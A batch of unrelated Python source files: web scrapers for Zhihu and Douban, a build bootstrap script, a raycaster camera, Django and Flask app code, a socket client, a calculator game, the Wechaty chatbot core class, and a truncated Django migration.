# #get link with re
# def getUrls(html):
# #pattern = re.compile('<a href="/story/(.*?)"',re.S)
# pattern = re.compile('<a href="/story/(\d{0,9})"', re.S)
# items = re.findall(pattern,html)
# urls = ["http://daily.zhihu.com/story/"+str(item) for item in items]
# return urls
url = 'http://python.org'
#url = 'ftp://ftp.python.org/pub/python/README'
fpath = 'my.txt'
print getHtml(url, fpath)
print url
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bootstrap helps you to test pyFAI scripts without installing them
by patching your PYTHONPATH on the fly
example: ./bootstrap.py pyFAI-integrate test/testimages/Pilatus1M.edf
"""
__authors__ = ["Frédéric-Emmanuel Picca", "Jérôme Kieffer"]
__contact__ = "jerome.kieffer@esrf.eu"
__license__ = "GPLv3+"
__date__ = "21/11/2015"
import sys
import os
import shutil
import distutils.util
import subprocess
TARGET = "imagizer"
def _copy(infile, outfile):
"link or copy file according to the OS. Nota those are HARD_LINKS"
if "link" in dir(os):
os.link(infile, outfile)
else:
shutil.copy(infile, outfile)
def _distutils_dir_name(dname="lib"):
"""
Returns the name of a distutils build directory
"""
platform = distutils.util.get_platform()
architecture = "%s.%s-%i.%i" % (dname, platform,
sys.version_info[0], sys.version_info[1])
return architecture
def _distutils_scripts_name():
"""Return the name of the distrutils scripts sirectory"""
f = "scripts-{version[0]}.{version[1]}"
return f.format(version=sys.version_info)
def _get_available_scripts(path):
res = []
try:
res = " ".join([s.rstrip('.py') for s in os.listdir(path)])
except OSError:
res = ["no script available, did you ran "
"'python setup.py build' before bootstrapping ?"]
return res
def _copy_files(source, dest, extn):
"""
copy all files with a given extension from source to destination
"""
if not os.path.isdir(dest):
os.makedirs(dest)
full_src = os.path.join(os.path.dirname(__file__), source)
for clf in os.listdir(full_src):
if clf.endswith(extn) and clf not in os.listdir(dest):
_copy(os.path.join(full_src, clf), os.path.join(dest, clf))
def runfile(fname):
try:
execfile(fname)
except SyntaxError:
env = os.environ.copy()
env.update({"PYTHONPATH": LIBPATH + os.pathsep + os.environ.get("PYTHONPATH", ""),
"PATH": SCRIPTSPATH + os.pathsep + os.environ.get("PATH", "")})
run = subprocess.Popen(sys.argv, shell=False, env=env)
run.wait()
home = os.path.dirname(os.path.abspath(__file__))
SCRIPTSPATH = os.path.join(home,
'build', _distutils_scripts_name())
LIBPATH = (os.path.join(home,
'build', _distutils_dir_name('lib')))
if (not os.path.isdir(SCRIPTSPATH)) or (not os.path.isdir(LIBPATH)):
build = subprocess.Popen([sys.executable, "setup.py", "build"],
shell=False, cwd=os.path.dirname(__file__))
print("Build process ended with rc= %s" % build.wait())
# _copy_files("openCL", os.path.join(LIBPATH, TARGET, "openCL"), ".cl")
_copy_files("gui", os.path.join(LIBPATH, TARGET, "gui"), ".ui")
# _copy_files("calibration", os.path.join(LIBPATH, TARGET, "calibration"), ".D")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("usage: ./bootstrap.py <script>\n")
print("Available scripts : %s\n" %
_get_available_scripts(SCRIPTSPATH))
sys.exit(1)
os.system("cd %s;python setup.py build; cd -" % home)
print("Executing %s from source checkout" % (sys.argv[1]))
sys.path.insert(0, LIBPATH)
print("01. Patched sys.path with %s" % LIBPATH)
sys.path.insert(0, SCRIPTSPATH)
print("02. Patched sys.path with %s" % SCRIPTSPATH)
script = sys.argv[1]
sys.argv = sys.argv[1:]
print("03. patch the sys.argv : ", sys.argv)
print("04. Executing %s.main()" % (script,))
fullpath = os.path.join(SCRIPTSPATH, script)
if os.path.exists(fullpath):
runfile(fullpath)
else:
if os.path.exists(script):
runfile(script)
else:
for dirname in os.environ.get("PATH", "").split(os.pathsep):
fullpath = os.path.join(dirname, script)
if os.path.exists(fullpath):
runfile(fullpath)
break
|
import math
class Camera:
def __init__(self, pos_x, pos_y, angle, fov):
self.pos_x = pos_x
self.pos_y = pos_y
self.fov = fov
self.angle = angle
self.dir_x = math.cos(math.radians(angle))
self.dir_y = math.sin(math.radians(angle))
self.plane_x = self.dir_y * math.tan(math.radians(self.fov/2))
self.plane_y = self.dir_x * math.tan(math.radians(self.fov/2))
def set_fov(self, fov):
self.fov = fov
self.set_angle(self.angle)
def set_position(self, x, y):
self.pos_x = x
self.pos_y = y
def set_angle(self, angle):
self.angle = angle
self.dir_x = math.cos(math.radians(angle))
self.dir_y = math.sin(math.radians(angle))
self.plane_x = self.dir_y * math.tan(math.radians(self.fov/2))
self.plane_y = self.dir_x * math.tan(math.radians(self.fov/2))
def rotate(self, value):
self.set_angle(self.angle + value)
|
#coding = utf-8
from selenium import webdriver
from time import sleep, ctime
import os
options = webdriver.ChromeOptions()
options.binary_location = "C:/Users/ASUS/AppData/Local/Google/Chrome/Application/chrome.exe"
chrome_driver_binary = "C:/Users/ASUS/AppData/Local/Google/Chrome/Application/chromedriver"
driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options)
driver.get("http: //www. baidu.com")
sleep(3)
driver.find_element_by_id("kw").send_keys("Test search")
driver.find_element_by_id("su").click()
sleep(3)
driver.quit()
|
from django.db import models
from django.contrib.auth.models import User
class Project(models.Model):
choices_project = (
('completed' , 'Completed'),
('collab' , "Looking for Collaboration")
)
title = models.CharField(max_length = 100)
description = models.TextField()
status = models.CharField(max_length = 10, choices = choices_project)
skills = models.TextField()
user_posted = models.ForeignKey(to=User , on_delete=models.CASCADE)
def __str__(self):
return self.title
|
#!/usr/bin/python
import sys
sys.path.append('/usr/local/share/osckar/lib/')
import comm as c
import socket
comm = c.Comm()
class Osckar:
def __init__(self):
return
def connect(self,host,port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(('localhost', int(port)))
def signal(self,name,args):
self.sock.send('signal' + comm.makeChunk(name) + comm.makeChunk(args))
def registerEvent(self,name):
self.sock.send('regevt' + comm.makeChunk(name))
def registerEvents(self,names):
for name in names:
registerEvent(name)
def waitForEvent(self,name):
while True:
procedure = self.sock.recv(6)
if procedure == 'signal':
eventName = comm.readChunk(self.sock)
eventArgs = comm.readChunk(self.sock)
if eventName == name:
return eventArgs # return event's arguments
def waitForEvents(self,names):
while True:
procedure = self.sock.recv(6)
if procedure == 'signal':
eventName = comm.readChunk(self.sock)
eventArgs = comm.readChunk(self.sock)
for name in names:
if eventName == name:
return [name,eventArgs] # return event's name and args
|
__author__ = 'Dejust'
__name__ = 'engine'
|
"""
back.app.routes.alerts
This module contains the different services for the alerts table.
"""
from flask import jsonify, request, Blueprint
from .. import app, db
from ..models.alerts import Alerts
from ..utils import required_fields
alerts_blueprint = Blueprint('alerts', __name__)
@alerts_blueprint.route('/history', methods=['GET'])
def get_alerts_history():
""" Route that returns the last 20 alerts triggered from the different sections
Returns
-------
list
a list of alert in the format of dictionary
status code : int
HTTP status code of the request
"""
alerts_history = Alerts.query\
.order_by(Alerts.time.desc())\
.limit(20)
return jsonify([alert.as_dict() for alert in alerts_history]), 200
@alerts_blueprint.route('/add', methods=['POST'])
@required_fields(['section', 'status', 'hits', 'time'])
def createAlerts():
""" Route that create new a entry for an alert in database
Parameters
----------
section : str
the section on which the alert has been triggered
status : int
status: 1 is High traffic, 0 is back to normal
hits : int
number of hits that triggered the alert
time : datetime
time when the alert was triggered
Returns
-------
message
message caracterizing the request
status code
HTTP status code of the request
"""
form = { c.name: request.form[c.name] for c in Alerts(
).__table__.columns if c.name in request.form }
alerts = Alerts(**form)
db.session.add(alerts)
db.session.commit()
return jsonify(msg='OK'), 200 |
#coding=utf8
import httplib2
from BeautifulSoup import BeautifulSoup
from datetime import *
import random
import time
from fake_useragent import UserAgent
def processPage(head, content):
soup = BeautifulSoup(content)
acList = soup.find("ul", {"class" : "events-list events-list-pic100 events-list-psmall"}).findAll("li", {"class" : "list-entry"})
for ac in acList:
info = {}
info['title'] = ac.find("div", {"class" : "title"}).find('a')['title']
info['startTime'] = ac.find("time", {"itemprop" : "startDate"})['datetime']
info['endTime'] = ac.find("time", {"itemprop" : "endDate"})['datetime']
info['location'] = ac.find("meta", {"itemprop" : "location"})['content']
info['fee'] = ac.find("li", {"class" : "fee"}).strong.string
info['joined'] = ac.find("p", {"class" : "counts"}).findAll("span")[0].string
info['interested'] = ac.find("p", {"class" : "counts"}).findAll("span")[2].string
#for key in info:
#print info[key]
acTypes = ['music', 'drama', 'salon', 'party', 'film', 'exhibition', 'commonweal', 'travel', 'sports', 'others']
h = httplib2.Http(".cache")
urlTemplate = "http://shanghai.douban.com/events/%s-%s?start=%d"
headers = {
'Accept': 'application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
'Accept-Charset': 'UTF-8,*;q=0.5',
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
#'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24',
}
endDate = datetime(2010, 12, 31)
startDate = datetime(2010, 4, 26)
activityIds = []
ua = UserAgent()
while(startDate != endDate):
startDate = startDate + timedelta(-1)
strDate = startDate.strftime("%Y%m%d")
for curType in acTypes:
page = 0
while(1):
url = urlTemplate % (strDate,curType,page)
page += 10
print url
#headers['User-Agent'] = random.choice(user_agent_list)
headers['User-Agent'] = ua.random
resp, content = h.request(url, headers=headers)
print resp.status
if (resp.status != 200):
f = open("errors", "a+")
f.write(url)
f.write("\n")
f.write("%d" % resp.status)
f.write("\n")
f.close()
soup = BeautifulSoup(content)
eventList = soup.find("ul", {"class" : "events-list events-list-pic100 events-list-psmall"})
if (eventList == None):
break
filename = ".data/2010/%s-%s-%d" % (strDate, curType, page)
f = open(filename, "w")
content = "".join([str(item) for item in eventList.contents])
f.write(content)
f.close()
time.sleep(1)
#processPage(resp, content) |
EPOCHS = 9 # Number of epochs
BATCH_SIZE = 1
SHUFFLE_DATA = True
NUM_WORKERS = 6
EMBEDDING_DIM = 256
HIDDEN_DIM = 512
MAX_LENGTH = 100
MODEL_NAME = "entity-extraction2"
|
Your input
10
3
Output
3
Expected
3
Your input
11
3
Output
3
Expected
3 |
"""Brain Calc game logic."""
import operator
import random
from typing import Tuple
MIN_NUMBER = 0
MAX_NUMBER = 10
DESCRIPTION = 'What is the result of the expression?'
def calculate(operand1: int, operand2: int, operator_sign: str) -> int:
"""
Calculate the result of applying the operation to operands.
Args:
operand1: first operand
operand2: second operand
operator_sign: operator to apply
Returns:
int: result of calculation
"""
operator_name = {
'+': 'add',
'-': 'sub',
'*': 'mul',
}
operator_function = getattr(operator, operator_name[operator_sign])
return operator_function(operand1, operand2)
def get_task() -> Tuple[str, str]:
"""
Generate new question and right answer for calc game.
Returns:
dict: dict with question and answer
"""
number1 = random.randint(MIN_NUMBER, MAX_NUMBER)
number2 = random.randint(MIN_NUMBER, MAX_NUMBER)
operator_sign = random.choice(['+', '-', '*'])
question = '{number1} {operator} {number2}'.format(
number1=number1,
number2=number2,
operator=operator_sign,
)
answer = str(calculate(number1, number2, operator_sign))
return question, answer
|
"""
Python Wechaty - https://github.com/wechaty/python-wechaty
Authors: Huan LI (李卓桓) <https://github.com/huan>
Jingjing WU (吴京京) <https://github.com/wj-Mcat>
2020-now @ Copyright Wechaty
Licensed under the Apache License, Version 2.0 (the 'License');
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an 'AS IS' BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
#
# Python 3.7: PEP 563: Postponed Evaluation of Annotations
# https://docs.python.org/3.7/whatsnew/3.7.html#pep-563-postponed-evaluation-of-annotations
from __future__ import annotations
import asyncio
import logging
import traceback
from datetime import datetime
from dataclasses import dataclass
from typing import (
# TYPE_CHECKING,
Any,
Callable,
Optional,
Type,
List,
Union,
cast,
)
import requests.exceptions
from grpclib.exceptions import StreamTerminatedError
from pyee import AsyncIOEventEmitter
from apscheduler.schedulers.base import BaseScheduler
from wechaty_puppet import (
Puppet,
EventLoginPayload,
EventLogoutPayload,
EventDongPayload,
EventScanPayload,
EventErrorPayload,
EventHeartbeatPayload,
EventFriendshipPayload,
EventMessagePayload,
EventRoomInvitePayload,
EventRoomTopicPayload,
EventRoomLeavePayload,
EventRoomJoinPayload,
ScanStatus,
EventReadyPayload,
WechatyPuppetError,
get_logger,
)
from wechaty_puppet.schemas.puppet import PUPPET_EVENT_DICT, PuppetOptions
from wechaty_puppet.state_switch import StateSwitch
from wechaty.user.url_link import UrlLink
from wechaty.utils.async_helper import SingleIdContainer
from wechaty.user import (
Contact,
Friendship,
Message,
Tag,
Room,
Image,
RoomInvitation,
MiniProgram,
Favorite,
ContactSelf
)
from wechaty.plugin import (
WechatyPlugin,
WechatyPluginManager,
WechatySchedulerOptions
)
from wechaty.exceptions import (
WechatyStatusError,
WechatyConfigurationError,
WechatyOperationError,
)
from wechaty.utils import timestamp_to_date, qr_terminal
log: logging.Logger = get_logger('Wechaty')
DEFAULT_TIMEOUT = 300
PuppetModuleName = str
# pylint: disable=too-many-instance-attributes
@dataclass
class WechatyOptions:
"""
WechatyOptions instance
"""
name: str = 'Python Wechaty'
puppet: Union[PuppetModuleName, Puppet] = 'wechaty-puppet-service'
puppet_options: PuppetOptions = PuppetOptions()
host: str = '0.0.0.0'
port: int = 5000
# expose the puppet options at here to make it easy to user
token: Optional[str] = None
endpoint: Optional[str] = None
scheduler: Optional[Union[WechatySchedulerOptions, BaseScheduler]] = None
# pylint:disable=R0902,R0904
class Wechaty(AsyncIOEventEmitter):
"""
A robot is a Wechaty instance, \
and all user-related modules should be accessed through the instance, \
which ensures consistency of service connections. \
In addition, all logic should be organized in the form of plug-ins and \
event subscriptions to ensure isolation between different businesses.
"""
_global_instance: Optional['Wechaty'] = None
# define the event
# save login user contact_id
contact_id: str
def __init__(self, options: Optional[WechatyOptions] = None):
"""
init Wechaty instance
Args:
options: WechatyOptions
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
"""
super().__init__()
# 1. int the puppet options
if options is None:
options = WechatyOptions(puppet='wechaty-puppet-service')
if options.puppet_options is None:
options.puppet_options = PuppetOptions()
options.puppet_options.token = options.puppet_options.token or options.token
options.puppet_options.end_point = options.puppet_options.end_point or options.endpoint
options.puppet = self._load_puppet(options)
# 2. init the scheduler options
self._options = options
# pylint: disable=C0103
self.Tag: Type[Tag] = Tag
# pylint: disable=C0103
self.Contact: Type[Contact] = Contact
# pylint: disable=C0103
self.ContactSelf: Type[ContactSelf] = ContactSelf
# pylint: disable=C0103
self.Friendship: Type[Friendship] = Friendship
# pylint: disable=C0103
self.Message: Type[Message] = Message
# pylint: disable=C0103
self.Room: Type[Room] = Room
# pylint: disable=C0103
self.Image: Type[Image] = Image
# pylint: disable=C0103
self.RoomInvitation: Type[RoomInvitation] = RoomInvitation
self.Favorite: Type[Favorite] = Favorite
self.MiniProgram: Type[MiniProgram] = MiniProgram
self.UrlLink: Type[UrlLink] = UrlLink
# TODO -> url-link, miniprogram
self.started: bool = False
self._name: Optional[str] = None
self.state = StateSwitch()
self._ready_state = StateSwitch()
self._puppet: Puppet = options.puppet
self._plugin_manager: WechatyPluginManager = WechatyPluginManager(
self,
(options.host, options.port),
scheduler_options=options.scheduler
)
@property
def puppet(self) -> Puppet:
"""
Always expected to return a non-null puppet instance, or raise an error.
Args:
None
Returns:
Puppet: puppet instance
"""
if not self._puppet:
raise WechatyStatusError('Wechaty puppet not loaded!')
return self._puppet
@staticmethod
def _load_puppet(options: WechatyOptions) -> Puppet:
"""
dynamic load puppet
Args:
options: WechatyOptions
Returns:
Puppet: puppet instance
"""
if options.puppet is None:
raise WechatyConfigurationError('puppet not exist')
if isinstance(options.puppet, Puppet):
return options.puppet
if isinstance(options.puppet, PuppetModuleName):
if options.puppet != 'wechaty-puppet-service':
raise TypeError('Python Wechaty only supports wechaty-puppet-service right now.'
'This puppet is not supported: ' + options.puppet)
#
# wechaty-puppet-service
#
puppet_service_module = __import__('wechaty_puppet_service')
if not hasattr(puppet_service_module, 'PuppetService'):
raise WechatyConfigurationError('PuppetService not exist in '
'wechaty-puppet-service')
puppet_service_class = getattr(puppet_service_module, 'PuppetService')
if not issubclass(puppet_service_class, Puppet):
raise WechatyConfigurationError(f'Type {puppet_service_class} '
f'is not correct')
return puppet_service_class(options.puppet_options)
raise WechatyConfigurationError('puppet expected type is [Puppet, '
'PuppetModuleName(str)]')
def __str__(self) -> str:
"""str format of the Room object"""
return f'Wechaty<{self.name}, {self.contact_id}>'
@classmethod
def instance(cls: Type[Wechaty], options: Optional[WechatyOptions] = None
) -> Wechaty:
"""
get or create global wechaty instance.
Args:
options: WechatyOptions
Returns:
Wechaty: global wechaty instance
"""
log.info('instance()')
if cls._global_instance is None:
cls._global_instance = cls(options)
# Huan(202003): how to remove cast?
return cls._global_instance
# return cast(Wechaty, cls._global_instance)
# return cls._global_instance
def use(self, plugin: Union[WechatyPlugin, List[WechatyPlugin]]) -> Wechaty:
"""register the plugin
Args:
plugin: WechatyPlugin or List[WechatyPlugin]
Returns:
Wechaty: self
"""
if isinstance(plugin, WechatyPlugin):
plugins = [plugin]
else:
plugins = plugin
for item in plugins:
self._plugin_manager.add_plugin(item)
return self
@property
def name(self) -> str:
"""name"""
if self._name is None:
return 'default_puppet'
return self._name
def on(self, event: str, f: Callable[..., Any] = None) -> Wechaty: # type: ignore
"""
listen wechaty event
Args:
event: the event name, see at `WechatyEventName`.
listener: the function bind to event name, see at `WechatyEventFunction`.
Examples:
Event:scan
>>> bot.on('scan', lambda qrcode, status: print(qrcode, status))
>>> bot.start()
Returns:
Wechaty: self
"""
log.info('on() listen event <%s> with <%s>', event, f)
super().on(event, f)
return self
def emit(self, event: str, *args: Any, **kwargs: Any) -> bool:
"""
emit wechaty event
Args:
event: the event name need to emit, see at `WechatyEventName`.
Returns:
bool: True if emit success, False if emit failed.
"""
log.debug('emit() event <%s> <%s>',
[str(item) for item in args],
kwargs)
return super().emit(event, *args, **kwargs)
async def on_error(self, payload: EventErrorPayload) -> None:
"""
listen error event for puppet
this is friendly for code typing
"""
async def on_heartbeat(self, payload: EventHeartbeatPayload) -> None:
"""
listen heartbeat event for puppet
this is friendly for code typing
"""
async def on_friendship(self, friendship: Friendship) -> None:
"""
listen friendship event for puppet
this is friendly for code typing
"""
async def on_login(self, contact: Contact) -> None:
"""
listen login event for puppet
this is friendly for code typing
"""
async def on_logout(self, contact: Contact) -> None:
"""
listen logout event for puppet
this is friendly for code typing
"""
async def on_message(self, msg: Message) -> None:
"""
listen message event for puppet
this is friendly for code typing
"""
async def on_ready(self, payload: EventReadyPayload) -> None:
"""
listen ready event for puppet
this is friendly for code typing
"""
async def on_room_invite(self, room_invitation: RoomInvitation) -> None:
"""
listen room_invitation event for puppet
this is friendly for code typing
"""
async def on_room_join(self, room: Room, invitees: List[Contact],
inviter: Contact, date: datetime) -> None:
"""
listen room_join event for puppet
this is friendly for code typing
"""
async def on_room_leave(self, room: Room, leavers: List[Contact],
remover: Contact, date: datetime) -> None:
"""
listen room_leave event for puppet
room, leavers, remover, date
this is friendly for code typing
"""
async def on_room_topic(self, room: Room, new_topic: str, old_topic: str,
changer: Contact, date: datetime) -> None:
"""
listen room_topic event for puppet
this is friendly for code typing
"""
async def on_scan(self, qr_code: str, status: ScanStatus,
data: Optional[str] = None) -> None:
"""
listen scan event for puppet
this is friendly for code typing
"""
async def start(self) -> None:
"""
start wechaty bot
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
>>> await bot.start()
Returns:
None
"""
# If the network is shut-down, we should catch the connection
# error and restart after a minute.
try:
await self.init_puppet()
await self.init_puppet_event_bridge(self.puppet)
log.info('starting puppet ...')
await self.puppet.start()
self.started = True
# register the system signal
except (requests.exceptions.ConnectionError, StreamTerminatedError, OSError):
# TODO: this problem is the most common error, so I add chinese & detail info for
# developer. this should be removed later.
# pylint: disable=C0301
error_info = '''The network is not good, the bot will try to restart after 60 seconds.
But here are some suggestions for you:
* 查看token是否可用?(过期或协议不可用)
* docker 服务是否正常启动?
* python-wechaty bot 是否正常启动?
* python-wechaty bot 是否能ping通docker服务?
* 由于版本细节问题,目前python-wechaty 支持最好的wechaty镜像为:[wechaty/wechaty:0.65](https://hub.docker.com/layers/wechaty/wechaty/0.65/images/sha256-d39b9fb5dece3a8ffa88b80a8ccfd916be14b9d0de72115732c3ee714b0d6a96?context=explore)
I suggest that you should follow the template code from: https://wechaty.readthedocs.io/zh_CN/latest/ to avoid the unnecessary bugs.
'''
log.error(error_info)
await asyncio.sleep(60)
await self.restart()
except WechatyPuppetError:
traceback.print_exc()
loop = asyncio.get_event_loop()
loop.stop()
except Exception as e: # pylint: disable=broad-except
print(e)
async def restart(self) -> None:
"""
restart the wechaty bot
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
>>> await bot.restart()
Returns:
None
"""
log.info('restarting the bot ...')
await self.stop()
await self.start()
# pylint: disable=R0912,R0915,R0914
async def init_puppet_event_bridge(self, puppet: Puppet) -> None:
"""
init puppet event stream
"""
log.info('init_puppet_event_bridge() <%s>', puppet)
event_names = PUPPET_EVENT_DICT.keys()
# prevent once time event to emit twice and more ...
once_event = set()
for event_name in event_names:
if event_name == 'dong':
def dong_listener(payload: EventDongPayload) -> None:
log.debug('receive <dong> event <%s>', payload)
self.emit('dong', payload.data)
puppet.on('dong', dong_listener)
elif event_name == 'error':
async def error_listener(payload: EventErrorPayload) -> None:
if isinstance(payload, EventErrorPayload):
log.info('receive <error> event <%s>', payload)
self.emit('error', payload)
await self.on_error(payload)
else:
# Fixme: there is always <error> event, which the reason is not clear
# if there is no valid error message, it should not throw the error
if not payload:
return
log.error('internal error <%s>', payload)
puppet.on('error', error_listener)
elif event_name == 'heart-beat':
async def heartbeat_listener(payload: EventHeartbeatPayload) -> None:
log.info('receive <heart-beat> event <%s>', payload)
self.emit('heartbeat', payload.data)
await self.on_heartbeat(payload)
puppet.on('heart-beat', heartbeat_listener)
elif event_name == 'friendship':
async def friendship_listener(payload: EventFriendshipPayload) -> None:
log.info('receive <friendship> event <%s>', payload)
friendship = self.Friendship.load(payload.friendship_id)
await friendship.ready()
self.emit('friendship', friendship)
# this method will cause _events error, refer to
# :https://github.com/wechaty/python-wechaty/issues/122
# and this feature is considering to be removed, refer to
# https://github.com/wechaty/python-wechaty/issues/127
# friendship.contact().emit('friendship', friendship)
await self.on_friendship(friendship)
await self._plugin_manager.emit_events(
'friendship', friendship
)
puppet.on('friendship', friendship_listener)
elif event_name == 'login':
async def login_listener(payload: EventLoginPayload) -> None:
if 'login' in once_event:
return
once_event.add('login')
# init the plugins
await self._plugin_manager.start()
# set login contact_id
self.contact_id = payload.contact_id
log.info('receive <login> event <%s>', payload)
contact = self.ContactSelf.load(payload.contact_id)
await contact.ready()
self.emit('login', contact)
await self.on_login(contact)
# emit the login event to plugins
await self._plugin_manager.emit_events('login', contact)
puppet.on('login', login_listener)
elif event_name == 'logout':
async def logout_listener(payload: EventLogoutPayload) -> None:
# TODO -> should to ContactSelf
log.info('receive <logout> event <%s>', payload)
contact = self.ContactSelf.load(payload.contact_id)
await contact.ready()
self.emit('logout', contact)
await self.on_logout(contact)
# emit the logout event to plugins
await self._plugin_manager.emit_events('logout', contact)
puppet.on('logout', logout_listener)
elif event_name == 'message':
async def message_listener(payload: EventMessagePayload) -> None:
# sometimes, it will receive the specific message with two/three times
if SingleIdContainer.instance().exist(payload.message_id):
return
log.debug('receive <message> event <%s>', payload)
msg = self.Message.load(payload.message_id)
await msg.ready()
log.info('receive message <%s>', msg)
self.emit('message', msg)
await self.on_message(msg)
room = msg.room()
if room is not None:
room.emit('message', room)
# emit the message event to plugins
await self._plugin_manager.emit_events('message', msg)
puppet.on('message', message_listener)
elif event_name == 'ready':
async def ready_listener(payload: EventReadyPayload) -> None:
if 'ready' in once_event:
return
once_event.add('ready')
log.info('receive <ready> event <%s>', payload)
self.emit('ready', payload)
self._ready_state.on(True)
await self.on_ready(payload)
puppet.on('ready', ready_listener)
elif event_name == 'room-invite':
async def room_invite_listener(payload: EventRoomInvitePayload) -> None:
log.info('receive <room-invite> event <%s>', payload)
invitation = self.RoomInvitation.load(
payload.room_invitation_id)
self.emit('room-invite', invitation)
await self.on_room_invite(invitation)
# emit the room-invite event to plugins
await self._plugin_manager.emit_events(
'room-invite',
invitation
)
puppet.on('room-invite', room_invite_listener)
elif event_name == 'room-join':
async def room_join_listener(payload: EventRoomJoinPayload) -> None:
log.info('receive <room-join> event <%s>', payload)
room = self.Room.load(payload.room_id)
await room.ready()
invitees = [self.Contact.load(invitee_id)
for invitee_id in payload.invited_ids]
for invitee in invitees:
await invitee.ready()
inviter = self.Contact.load(payload.inviter_id)
await inviter.ready()
# timestamp is from hostie-server, but the value range is
# 10^10 ~ 10^13
# refer to
# :https://github.com/wechaty/python-wechaty/issues/1290
date = timestamp_to_date(payload.timestamp)
self.emit('room-join', room, invitees, inviter, date)
await self.on_room_join(room, invitees, inviter, date)
room.emit('join', invitees, inviter, date)
# emit the room-join event to plugins
await self._plugin_manager.emit_events(
'room-join', room,
invitees, inviter, date
)
puppet.on('room-join', room_join_listener)
elif event_name == 'room-leave':
async def room_leave_listener(payload: EventRoomLeavePayload) -> None:
log.info('receive <room-leave> event <%s>', payload)
room = self.Room.load(payload.room_id)
# room info is dirty now
await room.ready(force_sync=True)
leavers = [self.Contact.load(inviter_id) for inviter_id
in payload.removed_ids]
for leaver in leavers:
await leaver.ready()
remover = self.Contact.load(payload.remover_id)
await remover.ready()
date = timestamp_to_date(payload.timestamp)
self.emit('room-leave', room, leavers, remover, date)
await self.on_room_leave(room, leavers, remover, date)
room.emit('leave', leavers, remover, date)
if self.puppet.self_id() in payload.removed_ids:
pass
# await self.puppet.room_payload(payload.room_id)
# await self.puppet.room_member_payload_dirty(
# payload.room_id)
# emit the room-leave event to plugins
await self._plugin_manager.emit_events(
'room-leave', room, leavers, remover, date
)
puppet.on('room-leave', room_leave_listener)
elif event_name == 'room-topic':
async def room_topic_listener(payload: EventRoomTopicPayload) -> None:
log.info('receive <room-topic> event <%s>', payload)
room: Room = self.Room.load(payload.room_id)
await room.ready()
changer = self.Contact.load(payload.changer_id)
await changer.ready()
date = timestamp_to_date(payload.timestamp)
self.emit('room-topic', room, payload.new_topic,
payload.old_topic, changer, date)
await self.on_room_topic(room, payload.new_topic,
payload.old_topic, changer, date)
room.emit('topic', payload.new_topic, payload.old_topic,
changer, date)
# emit the room-topic to plugins
await self._plugin_manager.emit_events(
'room-topic', room,
payload.new_topic,
payload.old_topic,
changer, date
)
puppet.on('room-topic', room_topic_listener)
elif event_name == 'scan':
async def scan_listener(payload: EventScanPayload) -> None:
log.info('receive <scan> event <%s>', payload)
qr_code = '' if payload.qrcode is None \
else payload.qrcode
if payload.status == ScanStatus.Waiting:
qr_terminal(qr_code)
log.info(
'or you can scan qrcode from: '
'https://wechaty.js.org/qrcode/%s',
qr_code
)
self.emit('scan', qr_code, payload.status, payload.data)
await self.on_scan(qr_code, payload.status, payload.data)
# emit the scan event to plugins
await self._plugin_manager.emit_events(
'scan', qr_code,
payload.status,
payload.data
)
puppet.on('scan', scan_listener)
elif event_name == 'reset':
log.info('receive <reset> event <%s>')
else:
raise WechatyOperationError(f'event_name <{event_name}> unsupported!')
log.info('initPuppetEventBridge() puppet.on(%s) (listenerCount:%s) '
'registering...',
event_name, puppet.listener_count(event_name))
def add_listener_function(self, event: str, listener: Callable[..., Any]) -> None:
"""add listener function to event emitter"""
self.on(event, listener)
async def init_puppet(self) -> None:
"""
init puppet grpc connection
"""
# Recreate puppet instance
self._puppet = self._load_puppet(self._options)
# Using metaclass to create a dynamic subclass to server multi bot instances.
meta_info = dict(_puppet=self.puppet, _wechaty=self, abstract=False)
self.ContactSelf = type('ContactSelf', (ContactSelf,), meta_info)
self.Contact = type('Contact', (Contact,), meta_info)
self.Favorite = type('Favorite', (Favorite,), meta_info)
self.Friendship = type('Friendship', (Friendship,), meta_info)
self.Image = type('Image', (Image,), meta_info)
self.Message = type('Message', (Message,), meta_info)
self.MiniProgram = type('MiniProgram', (MiniProgram,), meta_info)
self.UrlLink = type('UrlLink', (UrlLink,), meta_info)
self.Room = type('Room', (Room,), meta_info)
self.RoomInvitation = type('RoomInvitation', (RoomInvitation,), meta_info)
self.Tag = type('Tag', (Tag,), meta_info)
async def stop(self) -> None:
"""
stop the wechaty bot
Args:
None
Examples:
>>> await bot.stop()
Returns:
None
"""
log.info('wechaty is stopping ...')
await self.puppet.stop()
self.started = False
self._puppet = None
log.info('wechaty has been stopped gracefully!')
def user_self(self) -> ContactSelf:
"""
get user self
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
>>> contact = bot.user_self()
Returns:
ContactSelf: user self
"""
user_id = self.puppet.self_id()
user = self.ContactSelf.load(user_id)
# cast Contact -> ContactSelf
user = cast(ContactSelf, user)
return user
def self(self) -> ContactSelf:
"""
get user self
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
>>> contact = bot.self()
Returns:
ContactSelf: user self
"""
return self.user_self()
|
# Generated by Django 3.1.6 on 2021-03-24 20:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.TextField(unique=True)),
('display_name', models.TextField()),
('photo_url', models.TextField()),
('is_admin', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='League',
